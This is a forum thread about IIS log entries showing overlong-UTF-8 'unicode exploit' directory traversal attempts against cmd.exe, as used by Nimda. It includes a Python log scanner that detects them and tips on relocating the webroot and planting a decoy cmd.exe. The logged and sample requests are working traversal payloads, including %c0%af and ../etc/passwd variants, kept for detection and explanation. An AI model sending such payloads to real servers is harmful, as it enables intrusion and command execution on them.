Have I been missing something?????
While this is a standard attempt at directory traversal I have never noticed these particular strings ("ø€€€¯") in the attempt. Is this new or have I just not been graced by this little nasty before? Or are my powers of observation failing....... :o
2003-05-01 05:50:51 Daemon.Info XXX.XXX.XXX.XXX May 1 05:50:51 My Server <009>2003-05-01 09:50:49 216.185.74.XXX - XXX.XXX.XXX.XXX 80 GET /msadc/..ð€€¯../winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/3.0+(compatible)
2003-05-01 05:50:51 Daemon.Info XXX.XXX.XXX.XXX May 1 05:50:51 My Server <009>2003-05-01 09:50:50 216.185.74.XXX - XXX.XXX.XXX.XXX 80 GET /msadc/..ø€€€¯../..ø€€€¯../..ø€€€¯../winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/3.0+(compatible)
2003-05-01 05:51:01 Daemon.Info XXX.XXX.XXX.XXX May 1 05:51:01 My Server <009>2003-05-01 09:50:57 216.185.74.XXX - XXX.XXX.XXX.XXX 80 GET /msadc/..ð€€¯../..ð€€¯../..ð€€¯../winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/3.0+(compatible)
2003-05-01 05:51:01 Daemon.Info XXX.XXX.XXX.XXX May 1 05:51:01 My Server <009>2003-05-01 09:50:58 216.185.74.XXX - XXX.XXX.XXX.XXX 80 GET /msadc/..ü€€€€¯../..ü€€€€¯../..ü€€€€¯../winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/3.0+(compatible)
2003-05-01 05:51:06 Daemon.Info XXX.XXX.XXX.XXX May 1 05:51:06 My Server <009>2003-05-01 09:51:01 216.185.74.XXX - XXX.XXX.XXX.XXX 80 GET /msadc/..ø€€€¯../winnt/system32/cmd.exe /c+dir+c:\ 404 Mozilla/3.0+(compatible)
Re: Have I been missing something?????
It's probably a unicode string. Something like %c1%c9 will create these characters. It's known as the unicode exploit and viruses like Nimda use it to break out of the webroot and into your winnt directory.
Unfortunately unicode has several different encodings for / and \ . Someone is probably using a different set than usual to evade detection by IDSs.
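Added example, not posted by anyone in this thread: a small Python checker that does what the reply above describes, so you can see why an IDS keyed on "../" or "%2f" misses these. Viewed in a Windows-1252 log viewer, "ø€€€¯" is the byte sequence F8 80 80 80 AF, "ð€€¯" is F0 80 80 AF and "ü€€€€¯" is FC 80 80 80 80 AF; all three are overlong UTF-8 encodings of "/" (0x2F), and the classic "%c0%af" is the two-byte form. The code percent-decodes, then decodes UTF-8 the permissive way (accepting overlong and the obsolete 5/6-byte forms), then counts ".." segments in the result. The log lines, IP addresses and function names are constructed for the example.

```python
import re
from urllib.parse import unquote_to_bytes

# Smallest code point each sequence length may legitimately encode (RFC 3629);
# a sequence decoding to something smaller is an overlong form.
_MIN_CODEPOINT = {2: 0x80, 3: 0x800, 4: 0x10000, 5: 0x200000, 6: 0x4000000}


def lenient_utf8_decode(data: bytes):
    """Decode like a permissive decoder that accepts overlong sequences and the
    old 5- and 6-byte forms. Returns (text, number_of_overlong_sequences)."""
    out, overlong, i = [], 0, 0
    while i < len(data):
        b = data[i]
        if b < 0x80:                      # plain ASCII
            out.append(chr(b)); i += 1; continue
        if   0xC0 <= b <= 0xDF: length, cp = 2, b & 0x1F
        elif 0xE0 <= b <= 0xEF: length, cp = 3, b & 0x0F
        elif 0xF0 <= b <= 0xF7: length, cp = 4, b & 0x07
        elif 0xF8 <= b <= 0xFB: length, cp = 5, b & 0x03
        elif 0xFC <= b <= 0xFD: length, cp = 6, b & 0x01
        else:                             # stray continuation byte or FE/FF
            out.append("\ufffd"); i += 1; continue
        tail = data[i + 1:i + length]
        if len(tail) != length - 1 or any(not 0x80 <= t <= 0xBF for t in tail):
            out.append("\ufffd"); i += 1; continue   # truncated / malformed
        for t in tail:
            cp = (cp << 6) | (t & 0x3F)
        if cp < _MIN_CODEPOINT[length]:
            overlong += 1                 # e.g. C0 AF or F8 80 80 80 AF -> "/"
        out.append(chr(cp) if cp <= 0x10FFFF else "\ufffd")
        i += length
    return "".join(out), overlong


def analyze_path(raw_path: str) -> dict:
    """Canonicalise a request path the way a sloppy server might, and report
    what a strict decoder (or a naive signature) would have hidden."""
    # Log viewers show one byte per character, so latin-1 recovers the bytes;
    # a real pipeline would hand the raw request bytes in directly.
    decoded = unquote_to_bytes(raw_path.encode("latin-1"))
    text, overlong = lenient_utf8_decode(decoded)
    canonical = text.replace("\\", "/")   # both separators count on Windows
    segments = canonical.split("/")
    return {
        "canonical": canonical,
        "overlong_sequences": overlong,
        "dotdot_segments": segments.count(".."),
        "suspicious": overlong > 0 or ".." in segments,
    }


# Constructed log lines in the same shape as the ones in the thread. The \x
# escapes are the bytes a Windows-1252 viewer would render as ø€€€¯ etc.
SAMPLE_LOG_LINES = [
    "2003-05-01 09:50:49 192.0.2.10 - 192.0.2.1 80 GET /msadc/..\xf0\x80\x80\xaf../winnt/system32/cmd.exe /c+dir+c:\\ 404 Mozilla/3.0",
    "2003-05-01 09:50:50 192.0.2.10 - 192.0.2.1 80 GET /msadc/..\xf8\x80\x80\x80\xaf../..\xf8\x80\x80\x80\xaf../winnt/system32/cmd.exe /c+dir+c:\\ 404 Mozilla/3.0",
    "2003-05-01 09:50:58 192.0.2.10 - 192.0.2.1 80 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir+c:\\ 404 Mozilla/3.0",
    "2003-05-01 09:51:02 192.0.2.10 - 192.0.2.1 80 GET /products/..%2f..%2fetc/passwd - 404 Mozilla/3.0",
    "2003-05-01 09:51:05 192.0.2.20 - 192.0.2.1 80 GET /index.html - 200 Mozilla/3.0",
    "2003-05-01 09:51:07 192.0.2.21 - 192.0.2.1 80 GET /caf\xc3\xa9/menu.html - 200 Mozilla/3.0",  # valid UTF-8, benign
]


def scan_log_lines(lines):
    """Return (requested_path, report) for every GET whose canonical form
    contains '..' segments or used an overlong UTF-8 sequence."""
    hits = []
    for line in lines:
        m = re.search(r"\bGET\s+(\S+)", line)
        if m:
            report = analyze_path(m.group(1))
            if report["suspicious"]:
                hits.append((m.group(1), report))
    return hits


if __name__ == "__main__":
    for path, report in scan_log_lines(SAMPLE_LOG_LINES):
        print(f"{report['canonical']:45s} overlong={report['overlong_sequences']} "
              f"dotdot={report['dotdot_segments']}")
```

The point of the example is the order of operations: percent-decode first, then a lenient UTF-8 pass, then the ".." count, which is the only order that makes every variant in the log collapse to the same "/msadc/../../winnt/system32/cmd.exe". Any overlong sequence at all is worth an alert on its own, since compliant clients never send one.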
Simple trick to thwart Nimda
Just a quick and simple tip:
Install Windows+IIS like you normally would on c:
Go to the Internet Information Server admin tool.
Disable the default web site.
Create a new web site and set its webroot on D: (or any other drive except c: )
Tada. Nimda can still break out of the webroot but there's no way to get to the winnt dir. So nimda cannot do any damage. This also prevents future (still to be found) ../ tricks.
I've used this trick to catch some ugly users.
On D: I created the same structure as on c: ( \inetpub\wwwroot )
Also on D: I created a winnt\system32 dir. Then I made a simple executable, named it cmd.exe and put it in d:\winnt\system32. When someone uses the unicode exploit, they get *my* executable and not the real cmd.exe. It just showed a simple html message stating they were logged and would be hunted down. It scared the **** out of them ;)